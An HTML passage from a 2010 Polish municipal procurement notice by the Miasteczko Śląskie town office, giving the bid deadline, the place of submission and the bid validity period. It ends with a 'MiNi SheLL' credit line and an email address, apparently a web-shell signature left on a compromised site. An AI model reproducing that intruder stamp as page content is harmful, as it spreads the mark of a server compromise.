<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pokój nr 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 10:00, miejsce: Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com